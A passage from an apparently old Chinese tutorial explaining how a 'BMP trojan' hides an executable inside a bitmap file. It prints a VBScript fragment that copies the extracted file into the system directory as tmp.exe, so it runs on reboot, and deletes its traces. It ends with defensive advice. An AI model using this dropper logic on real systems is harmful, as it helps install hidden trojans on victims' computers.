详解BMP木马(4)

On Error Resume Next　
FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe") 
FSO.GetFile(tmp & "tmp.dat").Delete 
FSO.GetFile(tmp & "tmp.in").Delete 
FSO.GetFile(tmp & "tmp.out").Delete 
end if 
If Folder.SubFolders.Count <> 0 Then 
For Each SubFolder In Folder.SubFolders 
SearchBMPFile SubFolder,fname 
Next 
End If 
End Function 

这个脚本会找出在临时文件夹中的bmp文件,并生成一个DEBUG的脚本,运行时会自动从BMP文件54字节处读去你指定大小的数据,并把它保存到tmp.dat中.后面的脚本再把它复制到SYSTEM的目录下.这个被还原的EXE文件会在下次重起的时候运行.这就是BMP木马的基本实现过程. 
详细脚本代码请参考http://hotsky.363.net 

防范方法: 
最简单,删除或改名wscrpit.exe文件和DEBUG 文件; 
安装有效的杀毒软件,因为这些脚本有好多杀毒软件已经可以查出来了. 
在条件允许的情况下,安装WIN2K SP3,尽量避免去一些不名来历的网站.